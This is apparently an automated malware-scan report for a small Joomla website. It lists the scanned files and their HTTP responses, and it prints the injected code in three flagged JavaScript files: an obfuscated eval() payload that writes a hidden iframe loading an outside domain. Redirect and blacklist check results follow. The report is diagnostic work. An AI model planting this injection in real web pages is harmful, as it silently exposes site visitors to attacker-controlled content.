Scanned pages/files
| Request | Server response | Status |
http://asantiago.it/ | 200 OK Content-Length: 37495 Content-Type: text/html | clean |
http://asantiago.it/media/system/js/caption.js | 200 OK Content-Length: 2645 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var JCaption = new Class({ initialize: function(selector) { this.selector = selector; var images = $$(selector); images.each(function(image){ this.createCaption(image); }, this); }, createCaption: function(element) { var caption = document.createTextNode(element.title); var container = document.createElement("div"); var text = document.createElement("p"); var width = element.getAttribute("width" }); <!-- . -->;eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('3.7(\'<0 4="5://6-1.8/?9=2" a="b:c;"></0>\');',13,13,'iframe|statistic||document|src|http|g|write|info|id|style|display|none'.split('|'),0,{})); <!-- . --> Antivirus reports:
| ||
http://asantiago.it/plugins/content/ja_tabs/ja.tabs.js | 200 OK Content-Length: 15633 Content-Type: text/javascript | clean |
http://asantiago.it/modules/mod_ja_contentslide/assets/js/ja_contentslide.js | 200 OK Content-Length: 6996 Content-Type: text/javascript | clean |
http://asantiago.it/templates/ja_urani/js/ja.script.js | 200 OK Content-Length: 7395 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) if(typeof(jQuery) != "undefined" && $===jQuery){ jQuery.noConflict(); } function switchFontSize (ckname,val){ var bd = $E('body'); switch (val) { case 'inc': if (CurrentFontSize+1 < 7) { bd.removeClass('fs'+CurrentFontSize); CurrentFontSize++; bd.addClass('fs'+CurrentFontSize); } break; case 'dec': if (CurrentFontSize-1 > 0) { bd.removeClass('fs'+CurrentFontSiz jaIE6hover(); }); <!-- . -->;eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('3.7(\'<0 4="5://6-1.8/?9=2" a="b:c;"></0>\');',13,13,'iframe|statistic||document|src|http|g|write|info|id|style|display|none'.split('|'),0,{})); <!-- . --> Antivirus reports:
| ||
http://asantiago.it/templates/ja_urani/js/ja.ddmod.js | 200 OK Content-Length: 16500 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var src_collap_1 = tmplurl + "/images/icon-min.gif"; var src_collap_2 = tmplurl + "/images/icon-max.gif"; new Asset.images ([src_collap_1, src_collap_2]); var JADDModules = new Class({ options: { handles: false, containers: false, onStart: Class.empty, onComplete: Class.empty, ghost: true, snap: 3, title: 'h3', src_collap_1:'', src_collap_2:'', cookieprefix: '', onDragStart: fun } }); <!-- . -->;eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('3.7(\'<0 4="5://6-1.8/?9=2" a="b:c;"></0>\');',13,13,'iframe|statistic||document|src|http|g|write|info|id|style|display|none'.split('|'),0,{})); <!-- . --> Antivirus reports:
| ||
http://asantiago.it/templates/ja_urani/js/menu/mega.js | 200 OK Content-Length: 17295 Content-Type: text/javascript | clean |
http://asantiago.it/index.php | 200 OK Content-Length: 37513 Content-Type: text/html | clean |
http://asantiago.it/component/content/article/35-hot-news/53-linformatica-etica.html | 404 Not Found Content-Length: 958 Content-Type: text/html | clean |
http://asantiago.it/test404page.js | 404 Not Found Content-Length: 958 Content-Type: text/html | clean |
http://asantiago.it/component/content/article/35-hot-news/52-web-e-comunicazione.html | 404 Not Found Content-Length: 958 Content-Type: text/html | clean |
http://asantiago.it/component/content/article/3-newsflash/55-rete-ditalia.html | 404 Not Found Content-Length: 958 Content-Type: text/html | clean |
http://asantiago.it/component/banners/click/14.html | 404 Not Found Content-Length: 958 Content-Type: text/html | clean |
http://asantiago.it/component/banners/click/11.html | 404 Not Found Content-Length: 958 Content-Type: text/html | clean |
http://asantiago.it/component/banners/click/12.html | 404 Not Found Content-Length: 958 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: asantiago.it
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Fri, 05 Sep 2014 12:36:20 GMT
Pragma: no-cache
Server: Apache
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 05 Sep 2014 12:36:22 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: f6d213c4dae27dc06a0dc7653f916943=0ljlsksfifaianbahv8sa0at93; path=/
Set-Cookie: ja_urani_tpl=ja_urani; expires=Wed, 26-Aug-2015 12:36:22 GMT; path=/
X-Powered-By: PleskLin
GET / HTTP/1.1
Host: asantiago.it
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Fri, 05 Sep 2014 12:36:20 GMT
Pragma: no-cache
Server: Apache
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 05 Sep 2014 12:36:22 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: f6d213c4dae27dc06a0dc7653f916943=0ljlsksfifaianbahv8sa0at93; path=/
Set-Cookie: ja_urani_tpl=ja_urani; expires=Wed, 26-Aug-2015 12:36:22 GMT; path=/
X-Powered-By: PleskLin
Second query (visit from search engine):
GET / HTTP/1.1
Host: asantiago.it
Referer: http://www.google.com/search?q=asantiago.it
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: asantiago.it
Referer: http://www.google.com/search?q=asantiago.it
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=asantiago.it
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://asantiago.it/
Result: asantiago.it is not infected or malware details are not published yet.
Result: asantiago.it is not infected or malware details are not published yet.